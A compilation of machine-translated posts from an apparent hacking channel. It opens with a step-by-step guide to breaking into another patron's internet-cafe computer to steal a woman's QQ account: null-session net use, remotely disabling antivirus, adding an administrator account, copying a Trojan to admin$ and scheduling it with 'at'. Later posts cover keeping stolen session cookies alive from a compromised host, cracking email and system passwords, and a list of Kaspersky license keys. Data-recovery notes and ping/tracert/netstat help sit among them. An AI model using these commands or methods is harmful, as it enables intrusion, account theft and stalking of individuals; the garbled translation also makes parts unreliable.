▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Commands and techniques used for Internet cafe intrusion
Pinterest.com/undercode_Testing

>There are many Internet cafe management software, but most of them have one or another loophole, so there are many techniques for cracking Internet cafe software and Internet cafe software,

>you can surf the Internet for free, you can use the "command prompt" method, you can use administrator permissions, and so on. As a result, Internet cafes have become the most severe places for loss of virtual property. But as long as the level of the Internet cafe administrator is sufficient, this situation can be avoided. Let me tell you how I used to get the MMQQ number in Internet cafes. It is a little complicated. The hacker base is mainly to let you know some commands used during hacking.


🦑𝕃𝔼𝕋'𝕊 𝕊𝕋𝔸ℝ𝕋 :


The first step: first determine the IP of the computer used by the MM. The number and IP address of the computer in the Internet cafe are usually the same or higher. For example, the computer with the number 20 in the Internet cafe is generally 192.168.0.20 or 192.168.0.21 (192.168 .0.1 is left to the router), not only that, the machine name is also regular, the machine name of computer 20 is usually Wangba20, so as long as you know the computer used by MM, and then enter the "command prompt", Ping Wangba20 can get the IP address , Such as 192.168.0.20.

> Step 2: With the IP, you can start to connect to the MM computer. Because the computers in the Internet cafe mostly use Windows 2000 that has not been patched, and the user name for logging in to the computer is mostly an empty password in the form of "user number" Form, so at the "command prompt", enter net use //192.168.0.20/ipc$ "" / user: "" and net use //192.168.0.20/ipc$ "" / user: "user20" to establish a connection .

> After the connection is successful, you must close the anti-virus software on the other computer, right-click "My Computer", select "Management", right-click "Computer Management (Local)" in the pop-up window, and select "Connect to another computer" ", Connect to 192.168.0.20, start the" Telnet "service (" Computer Management "can directly manage remote computers).

-Step 3: Enter two commands under the "Command Prompt" to create a new user20 user on this machine and add it to the administrator group.

net user user20 / add

net localgroup administrators user20 / add

-Step 4: Go to C: \ Winnt \ System32, right-click CMD.EXE, select "Create Shortcut", then right-click the newly created shortcut, select "Properties", check "Run as other user" (to Run the program as another user). Run the shortcut CMD, after the "Run as another user" window pops up, enter "user20" and press Enter.

-Step 5: Log in to the MM computer with telnet 192.168.0.20, and then download a command-line killing software from the Internet, such as knlps, etc., and close the anti-virus software process on telnet.

-Step 6: You can download a Trojan now, and use the "copy Trojan name.exe //192.168.0.20/admin$" method to copy the Trojan to the MM computer. Then use net time //192.168.0.20 to get the time of the MM computer, for example, 4 pm, and finally use "at //192.168.0.20 time Trojan name.exe", such as "at //192.168.0.20 16:02 Trojan name The .exe "command runs the Trojan at the specified time.

🦑 With a Trojan, you can naturally know the QQ number used by MM.

How about it, is it dangerous in Internet cafes? However, you can rest assured that not all Internet cafes are like this. Most Internet cafes are still very safe. As long as you use QQ or other software, you can select "Internet cafe mode" (Click "Login Mode" option appears after "Advanced Settings".


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Basic knowledge of data record recovery
t.me/UndercodeTesting


🦑 Let's start with the data structure of the hard disk.

Hard disk data structure

We have no way to use a hard disk when we first buy it. You need to partition and format it, and then install the operating system before you can use it. Take the 9x / Me series that we have been using until now, we generally divide the hard disk into five parts: the main boot sector, the operating system boot sector, FAT, DIR and Data (of which only the main boot sector is the only one , The others increase with the number of your partitions).

Master boot sector

The main boot sector is located on track 0 cylinder 0 cylinder 1 sector of the entire hard disk, including the hard disk main boot record MBR (Main Boot Record) and partition table DPT (Disk Partition Table). The role of the master boot record is to check whether the partition table is correct and determine which partition is the boot partition, and transfer the startup program of the partition (that is, the operating system boot sector) to the memory for execution at the end of the program. As for the partition table, many people know that starting with 80H or 00H and ending with 55AAH, a total of 64 bytes, is located at the very end of the sector. It is worth mentioning that the MBR is generated by a partition program (such as Fdisk.exe for DOS), and this sector may be different for different operating systems. If you have this intention, you can write one yourself, as long as it can complete the aforementioned tasks, which is why you can achieve multi-system startup A lot of boot sector viruses).

Operating system boot sector

OBR (OS Boot Record) is the boot sector of the operating system, usually located on the 0 track 1 cylinder 1 sector of the hard disk (this is for DOS, for those systems that boot in multiple boot mode are located in the corresponding primary partition The first sector of the extended partition) is the first sector that the operating system can directly access. It also includes a boot program and a partition parameter record table called BPB (BIOS Parameter Block). In fact, each logical partition has an OBR, and its parameters vary depending on the size of the partition and the type of operating system. The main task of the boot program is to determine whether the first two files in the root directory of the partition are the boot files of the operating system (such as MSDOS or IO.SYS and MSDOS.SYS of Win9x / Me originating from MSDOS). If so, the first file is read into memory and control is given to the file. The BPB parameter block records the start sector, end sector, file storage format, hard disk media descriptor, root directory size, FAT number, size of allocation unit (also known as cluster) in the partition, etc. Important parameters. OBR is generated by an advanced formatter (eg Format.com for DOS).

File allocation table

FAT (File Allocation Table) is the file allocation table of DOS / Win9x system. For data security, FAT generally do two, the second FAT is the backup of the first FAT, the FAT area is immediately after the OBR , The size of which is determined by the size of the partition and the size of the file allocation unit. There are always many choices about the format of FAT. Microsoft's DOS and Windows use the familiar FAT12, FAT16 and FAT32 formats, but there is no other format of FAT other than this, like Windows NT, OS / 2, UNIX / Linux, Novell Etc. have their own file management methods.

Directory area

DIR is the abbreviation of Directory, that is, the root directory area. DIR is immediately after the second FAT table. Only FAT cannot locate the location of the file on the disk. FAT must cooperate with DIR to accurately locate the location of the file. DIR records the starting unit of each file (directory) (this is the most important), the file attributes, etc. When locating the file location, the operating system can know the specific location and size of the file on the disk according to the starting unit in the DIR and the FAT table. After the DIR area, it is the real data storage area, namely the DATA area.

Data area

Although DATA occupies most of the space of the hard disk, it does not have the previous parts. For us, it can only be some boring binary code, which makes no sense. One thing to note here is that what we usually call a formatter (referring to advanced formatting, such as the Format program under DOS) does not clear the data in the DATA area, but only rewrites the FAT table, as for the partition The hard disk has only modified the MBR and OBR. Most of the data in the DATA area has not been changed, which is why many hard disk data can be repaired. But even so, if one of the MBR / OBR / FAT / DIR is destroyed, it is enough for our so-called DIY veterans who have been busy for a long time ... What needs to be reminded is that if you regularly clean up the disk, then your data area The data may be continuous, so even if the MBR / FAT / DIR are all broken, we can use disk editing software (such as DiskEdit under DOS). As long as we find the starting storage location of a file, then this file may be Recovery (Of course, this requires a premise, that is, you did not overwrite this file ...).

🦑 Hard disk partition

The concept of partitions we usually talk about is nothing more than three types: primary partition, extended partition, and logical partition.

The main partition is a relatively simple partition, usually located in the frontmost area of the hard disk, forming a logical C disk. In the primary partition, no other logical disks are allowed.

The concept of extended partitions is more complicated, and is also the main cause of confusion between partitions and logical disks. Since the hard disk only reserves 64 bytes of storage space for the partition table, and the parameters of each partition occupy 16 bytes, the total data of 4 partitions can be stored in the main boot sector. The operating system only allows 4 partitions of data to be stored. If a logical disk is a partition, the system only allows up to 4 logical disks. For specific applications, 4 logical disks often cannot meet actual needs. In order to build more logical disks for use by the operating system, the system introduced the concept of extended partitions.


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

The basic knowledge of data recovery is almost introduced to you.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Talk about the specific role of session
t.me/UndercodeTesting


1) First of all, the session is implemented by language, has nothing to do with the web server, such as php session is implemented by php language.

2) Second, the content of the session is stored on the server, but everyone knows that the session is often used for authentication to identify each user. How does it correspond to the client?

> In fact, it is very simple. When the user submits a browsing request, the cookie carries a session field, php is SESSIONID. In this way, the server knows that the requester's session is stored in the SESSIONID, and the corresponding data can be read. Where did this SESSIONID come from?

3) Again, the session has a default timeout, I remember asp seems to be 20 minutes, not sure. So if you cross the site and you get the cookie after a long time, you can't log in. This is also the reason why it has been said that the Dongwang forum cross-sited and you can't log in to the background. Isn't it legend that the session cannot be forged? Because there were no tools like SessionIE at that time to keep the session from expiring. At that time, if the administrator happened to be cross-site and did not log out in the background, you can log in to the background using this cookie, because your sessionid has not expired.

4) Also, tools like SessionIE are not omnipotent. If the web program is well written, when the cross-site user logs out of the system, the cookie and session are destroyed, and the attacker will not be able to continue the session state. Because the session corresponding to this sessionid no longer exists on the server side, although you submitted the sessionid, there is no corresponding session data on the server side. The server program cannot obtain the session content required for authentication, and naturally cannot pass the authentication.

5) Finally, such tools can be written in cgi programs using languages ​​such as php that support sockets. Asp's XmlHTTP should be subject to cross-domain restrictions. That is to say, I put a php program on the broiler, read the cookie list regularly, and then use the curl library to load the cookie to access the corresponding url, keep the state is not lost, so you can turn off your PC.

6) In the end, there is nothing mysterious or bizarre about the session. Its essence is just a piece of data saved on the server side. This data has a unique ID. The ID server will tell the client through a set cookie. Then, when the client requests this ID, the server session can be associated with the client.

written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Kaspersky Internet Security ( KIS 91 ) Days OEM Trial Keys:

4CH4C-PPFDT-NFK4B-45R69
WN2CH-P55VX-B53EK-UY222
NQJMW-GBXCX-HSJZ3-Z2ZQS
783RV-DQRXR-XXVM9-93HKM ( for Mac )
Kaspersky Anti-Virus ( KAV ) 91 Days OEM Trial Key:

JHJ7C-C69PX-MQY3J-PKG5B
D36NR-H27XY-5MVEQ-6WUFX
QTZJM-3EA1P-VNFSV-HPWFX
52MFR-XMPS3-RPXBM-K6T5E

Kaspersky Total Security 91 Days OEM Trial Key:

B3DFM-Q3KGA-UP7WG-X5SQ6
VYRVR-YHE4C-QQXMK-PVYJE ( for Android )
Kaspersky Interner Security for Android 90 days :

BYK9U-EHE8S-J1WY8-SG1CN
JAPXZ-9G9EJ-CSUV2-7YQUS
Kaspersky Small Office Security for 91 days

BJT18-15VFY-DTQ7C-U2NBS
VACVK-SJ4E4-9GN3T-WCJD8
BJSYM-2YX3V-1RV9S-UHVYM
YGXVQ-1VF6D-6B7EZ-G5SK7
4CH4C-PPFDT-NFK4B-45R69
BYK9U-EHE8S-J1WY8-SG1CN
AKHW5-HRNA6-FKVD9-QYW8C

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Three ways to crack Email account
t.me/UndercodeTesting

E-mail is not safe. There may be a weak link in each link of the entire process of sending, transmitting and receiving mail. If a malicious user takes advantage of his vulnerability, he can easily hack out his account and obtain the content of the mail.



1. Exploit the loopholes in the mail server operating system

The mail server software runs on a specific operating system, such as Linux, Windows NT / 2000, etc. The default installation and configuration of these operating systems are insecure, and hackers can easily invade the system and obtain all user names and passwords.

1 Windows server

If it is an Exchange Mail Server based on Windows2000, the system itself has not been configured for any security and several services have been opened. Intruders can use the terminal server combined with the Chinese input method vulnerability or IIS's Buffer Overflow program to obtain Administrator permissions, use pwdump3 to export the hashed password, and then use L0pht to connect the dictionary or Brute Force to crack the user password. According to experience, if the password is simple, it can be cracked in a few minutes, and the Brute Force method with a length of 8 or less can be solved in a day.

2 Linux / UNIX server

UNIX systems generally use Sendmail as a mail system. After gaining control of the system, software such as John can crack passwords from / etc / passwd or / etc / shadow. If you use a database to save user information and passwords, it is also easy to export.

🦑 Second, use the loopholes in the mail server software itself

The most common mail server programs are Sendmail, Qmail, etc., and there are security flaws to varying degrees. Taking Sendmail as an example, in the previous old version, telnet to port 25, enter wiz, and then enter the shell, you can get a rootshell, and debug commands, you can also get root permissions. Qmail is more secure than Sendmail, but Qpoper has a Buffer Overflow defect, and it can remotely get the root shell to control the system.

Even if the mail server is secure, the intruder can obtain more information, such as the user name. Telnet to port 25, enter expn tom or vrfy tom to check if there are tom users in the system Although the latest version of Sendmail disables these two commands, you can determine whether the user exists by forging the sender and then using rcpt to.

Obtained the user name, you can telnet to port 110, try a simple password connection, or apply a dictionary to crack.

Therefore, it is necessary to prohibit the relay of non-local domain (relay), or use the module that is used by many ISPs to add SMTP authentication, which can enhance the security of the mail server.

🦑 In addition to receiving messages in POP3 mode, it is more popular to process mail on the WEB interface. This method is not without weaknesses. Generally, CGI is used to accept the form FORM parameters passed by the user, including username and password. If correct, you can enter the page for processing mail. To crack the passwords of known users, there are many softwares that use dictionaries or brute force combinations. The more famous one is Xiao Rong's "Snow Tracking". When the password is simple, the results will soon be available.

WEB mail system has the option of "forgot password", if you can crack another mailbox to send back the password or guess the answer to the prompt question, you can also succeed.

3. Eavesdropping during the transmission of mail

Install Sniffer in the network, specify to listen to the data packets sent to port 110 of the external server, and check the user and pass strings from the collected information to see the user name and corresponding password.


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 FAST BEGINERS TIPS
> Three common methods used by hackers to crack passwords
t.me/UndercodeTesting


🦑 Obtaining the password of the system administrator by cracking, and then mastering the control of the server, is an important method for hackers. There are many ways to crack and obtain the administrator password. The following are the three most common methods.



(1) Guess simple passwords: Many people use their or family members ’birthdays, phone numbers, room numbers, simple numbers, or ID numbers; others use their own names, children, spouse, or pet names; and Of system administrators use "password", even without a password, so that hackers can easily guess the password.

(2) Dictionary attack: If the simple password attack fails to guess, the hacker starts to try the dictionary attack, that is, every possibility of using the program to try the words in the dictionary. Dictionary attacks can use repeated logins or collect encrypted passwords and try to match words in the encrypted dictionary. Hackers usually use an English dictionary or a dictionary in other languages. They also use additional types of dictionary databases, such as names and commonly used passwords.

(3) Brute force guessing: similar to dictionary attacks, hackers try all possible combinations of characters. A password composed of 4 lowercase letters can be cracked in a few minutes, and a longer password composed of uppercase and lowercase letters, including numbers and punctuation, the possible combinations of 10 trillion. If you can try 1 million combinations per second, you can crack it within a month.


written by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Network test commands that must be learned
t.me/UndercodeTesting


>Understanding and mastering the following three commands will help y ou detect the network fault faster, thereby saving time and improving efficiency.

🦑 ping

Ping is a very useful tool for testing network connection status and packet sending and receiving status. It is the most commonly used command for network testing. Ping sends a loopback request packet to the target host (address, 2189), asking the target host to give a reply after receiving the request, thereby judging whether the network's response 🦑time and local machine are connected to the target host (address, 2189).

If the ping is unsuccessful, you can predict the failure in the following aspects: network cable failure, incorrect network adapter configuration, incorrect IP address. If the ping is successful and the network is still unavailable, the problem is probably in the software configuration of the network system. Successful ping can only guarantee that there is a connected physical path between the machine and the target host.

🦑Command format:

ping ip address or host name [-t] [-a] [-n count] [-l size]

Parameter meaning:

-t sends data to the target host non-stop;
-a displays the network address of the target host in ip address format;
-n count specifies how many times to ping, the specific number is specified by count;
-l size specifies the number sent to the target host The size of the packet.

🦑 For example, when your machine cannot access the internet, first of all, you want to confirm whether it is the failure of the local LAN. Assuming that the IP address of the proxy server on the LAN is 192.168.1.1, you can use the ping 192.168.1.1 command to check whether the machine is connected to the proxy server. As another example, the common command to test whether the local network card is installed correctly is ping 127.0.0.1.

🦑tracert

The tracert command is used to display the path that the data packet traverses to the target host and the time to reach each node. The command function is similar to ping, but the information it obtains is much more detailed than the ping command. It displays the entire path taken by the packet, the node's IP, and the time it takes. This command is more suitable for large networks.

🦑 Command format:

tracert ip address or host name [-d] [-h maximumhops] [-j host_list] [-w timeout]

Parameter meaning:

-d Does not resolve the name of the target host;
-h maximum_hops specifies the maximum number of hops to the target address;
-j host_list releases the source route according to the address in the host list;
-w timeout specifies the timeout interval, the default time unit of the program is milliseconds .

For example, if you want to know the detailed transmission path information between your computer and the target host www.cce.com.cn, you can enter tracert www.cce.com.cn in ms-dos mode.

🦑 If we add some parameters after the tracert command, we can also detect other more detailed information. For example, use the parameter -d to specify that the program also resolves the domain name of the target host when tracking the path information of the host.

netstat

The netstat command can help network administrators understand the overall usage of the network. It can display the detailed information of the currently active network connection, such as displaying network connection, routing table and network interface information. It can count the total number of network connections currently in operation.

Using command parameters, the command can display the usage status of all protocols, such as tcp protocol, udp protocol and ip protocol, etc. In addition, you can select a specific protocol and view its specific information, but also display the port number of all hosts and the current host Detailed routing information.

> Command format:

netstat [-r] [-s] [-n] [-a]

Parameter meaning:

-r displays the content of the local routing table;
-s displays the usage status of each protocol (including tcp protocol, udp protocol, ip protocol, 2189);
-n displays the address and port in the form of a digital table;
-a displays the host computer The port number.
witten by undercode
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 helpful Networking tests